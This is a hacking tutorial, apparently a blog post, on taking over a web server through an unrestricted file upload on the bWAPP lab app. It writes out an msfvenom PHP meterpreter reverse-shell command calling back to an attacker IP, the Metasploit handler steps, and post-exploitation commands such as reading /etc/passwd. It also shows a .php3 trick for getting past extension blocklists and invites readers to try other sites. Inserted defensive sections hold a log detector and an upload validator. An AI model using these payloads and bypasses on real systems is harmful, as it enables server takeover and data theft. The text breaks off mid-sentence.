Website Hijacking with Kali Linux | Metasploit 2021: latest, free and easy, get full data of a site

 

A big disclaimer: hacking is illegal. If you want to do any hacking, run it either in your own virtualized environment or on your own website. If you really want to test these different hacking techniques on other sites, check out bug bounty programs, because you could earn a dollar too if you are able to run any of these techniques and get a bug bounty for it.

 

Intro :-

In this tutorial you just upload a file and get full control of the entire website.

website hacking tutorial kali linux :-

I have bWAPP, a vulnerable web application for us to run hacking techniques on. Right here we have an option to browse and upload an image, so let's go ahead and click on it. In front of us I have several payloads that we can upload to the website and that will give us control of the entire site. You can try different sites as well.

How can we create that?

To create this kind of malicious payload, open up a terminal. I have a terminal running right here, and what we do next is use msfvenom to create the malicious payload. msfvenom is part of the Metasploit family,

where we can create different kinds of payloads. We can create payloads such as a malicious mobile application file, and payloads for Android devices or for iOS. In this case we are targeting a PHP application server, so we enter msfvenom -p (for payload) followed by php/meterpreter/reverse_tcp.

Then we specify the IP address of the attacker machine, or the hacker's machine, in this case 192.168.0.12. If I open up another terminal and enter ifconfig or ip addr, I can see the IP address right here, so the hacker's IP address is 192.168.0.12.

Going back to the earlier statement, we enter LHOST followed by LPORT of 4444. This is something you want to remember, because later, when we go to the Metasploit Framework, we will need all the options and all the values here to make sure we get a successful reverse shell. Once you have that in place, enter -f raw and send the output to a file named, for example, "hackerlaw.php".

command = msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=4444 -f raw > hackerlaw.php   ( replace 192.168.0.12 with your own IP )

exploiting | website hacking

That is the command we use here, and once we hit enter on it we are creating the malicious reverse shell. Here you can see the output, which shows a payload size of 1114. Now I can move the file. You can move it to the desktop or to wherever you want. I move hackerlaw.php into my desktop folder, and in this case I name it hacker.reverseshell.php. Hit enter on that and the file has been moved over. Go back to browse, click on hacker.reverseshell.php, double-click it and click upload. Once you click upload, the page states the following: "The image has been uploaded here."

What we do next is start up our listener. Go into one of the terminals and enter sudo msfconsole, which starts the Metasploit Framework for us, and hit enter on that. Now that the Metasploit Framework is up, enter use exploit/multi/handler. After that, set the payload with set payload, using the same payload as earlier:

php/meterpreter/reverse_tcp

Once you hit enter on this, enter show options to see the options available and all the values we can set for the payload. Enter set lhost 192.168.0.12, which is the IP address of the Kali Linux machine we are using as the hacker's box. Next, enter exploit and that's it: we are waiting with a TCP handler. Back on the website, we click the link to the image that has been uploaded, and you can see the tab start loading.

If I go back into the Metasploit Framework, you can see that Meterpreter session 1 has opened. All I have to do is enter help to see the list of commands that can give us information about the system, so I can enter

sysinfo

and we can see that this is bee-box and this is php/linux. I can enter shell to gain access to a bash shell running inside the operating system, and I can enter whoami

and we see www-data, so we are actually inside. I can enter pwd (print working directory), and here we are at /var/www/bWAPP/images. I can enter cat /etc/passwd and see what we get: all of the users on the system. You can see root, admin, games, mail, news and all these different details right here. We are literally in. This is it: game over.
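Seen from the defender's side, the step above leaves a clear trace in the web server log: a request for a script file inside a directory that should only serve images. The following is an added example, not part of the original tutorial; the URL prefix `/bWAPP/images/`, the log format (Apache combined) and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: uploads are served from this URL prefix (the tutorial's shell
# landed in .../bWAPP/images on disk). Adjust to the real upload path.
UPLOAD_PREFIX = "/bWAPP/images/"

# Extensions a PHP-enabled server may pass to the interpreter, including
# double extensions ("x.php.jpg") and PATH_INFO ("x.php/extra").
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(?:\.|/|$)", re.I)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines in Apache combined log format.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2021:10:00:01 +0000] "GET /bWAPP/images/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.0.12 - - [01/Jan/2021:10:00:02 +0000] "POST /bWAPP/upload HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.168.0.12 - - [01/Jan/2021:10:00:03 +0000] "GET /bWAPP/images/hacker.reverseshell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.0.12 - - [01/Jan/2021:10:05:09 +0000] "GET /bWAPP/images/hacker.reverseshell.php3 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2021:10:06:00 +0000] "GET /bWAPP/images/holiday.php.jpg?x=1 HTTP/1.1" 404 210 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2021:10:07:00 +0000] "GET /bWAPP/index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""


def suspicious_requests(log_text, prefix=UPLOAD_PREFIX):
    """Return (ip, status, path) for script-like requests under the upload dir."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # Drop the query string and decode %xx so encoded dots still match.
        path = unquote(m.group("path").split("?", 1)[0])
        if path.startswith(prefix) and SCRIPT_EXT.search(path[len(prefix):]):
            hits.append((m.group("ip"), m.group("status"), path))
    return hits


if __name__ == "__main__":
    for ip, status, path in suspicious_requests(SAMPLE_LOG):
        print(f"ALERT {ip} {status} {path}")
```

A 200 response to such a request means the server executed or served the file; any hit at all means the upload directory accepted a script extension.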

 

Problems and fixes ( for non-vuln. sites )

Now the problem is: what if there is some kind of file restriction when you upload, and you are not able to get past it? Let's take a look at how that can be bypassed, going back to the unrestricted file upload page.

In this case we have the same browse option. I double-click hacker.reverseshell.php and click upload, and the page states the following error: "Sorry, the file extension is not allowed. The following extensions are blocked." So .asp, .aspx, .dll, .exe, .jsp and .php are blocked, which means our file can no longer be uploaded to the site.

So what can we do? One good example to look at is the PHP file extension itself. If you search for it, you find php3, which is another file extension for PHP. Renaming the file extension to php3 as we upload can then bypass those extension restrictions. So now I can go to this site to convert the file:

site http://www.learningaboutelectronics.com/PHP-script-to-convert-web-page-file-extensions.php
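The bypass above works because the check is a blocklist: `.php3` is simply not on it. The following added example (not from the original tutorial) puts that blocklist beside an allowlist check of the kind a defender would use instead. The image-only policy, the function names and the sample bytes are assumptions made for illustration.

```python
import os
import secrets

# Blocklist copied from the error message quoted in the tutorial.
BLOCKED = {".asp", ".aspx", ".dll", ".exe", ".jsp", ".php"}

# Assumed policy for an image-only upload form: extension -> leading bytes.
ALLOWED_MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def blocklist_accepts(filename):
    """Weak check: anything not on the known-bad list is let through."""
    return os.path.splitext(filename)[1].lower() not in BLOCKED


def allowlist_store_name(filename, content):
    """Hardened check: return a server-chosen file name, or None to reject."""
    ext = os.path.splitext(filename)[1].lower()
    magics = ALLOWED_MAGIC.get(ext)
    if magics is None:
        return None  # extension is not a known image type
    if not content.startswith(magics):
        return None  # leading bytes do not match the claimed type
    # Never reuse the client's name: this drops double extensions such as
    # "x.php.png" and any path components the client supplied.
    return secrets.token_hex(16) + ext


# Constructed sample inputs (placeholder bytes, not a working payload).
SCRIPT_BYTES = b"<?php /* placeholder */ ?>"
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    for name, data in [
        ("hacker.reverseshell.php", SCRIPT_BYTES),
        ("hacker.reverseshell.php3", SCRIPT_BYTES),
        ("hacker.reverseshell.png", SCRIPT_BYTES),
        ("photo.png", PNG_BYTES),
    ]:
        print(name, blocklist_accepts(name), allowlist_store_name(name, data))
```

Magic bytes can be placed in front of a script, so the upload directory must also be configured so that the web server never executes files stored in it.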

 

In Metasploit, ensure that we have our session running: enter exploit again, and this starts the reverse TCP handler on the attacker's IP address of 192.168.0.12, port 4444. Back in the browser, click the uploaded file.

Go back to Metasploit and you will see that we are in and it's game over: Meterpreter session 2 opened. Now I can enter sysinfo and hit enter, and that's it, once again we are in: computer bee-box, Meterpreter php/linux. I can enter shell and then whoami, and once again we see www-data, so we are in. I can print the working directory; we can do whatever we want on the computer system. So what we can do now is to go back into the computer system, so how can we
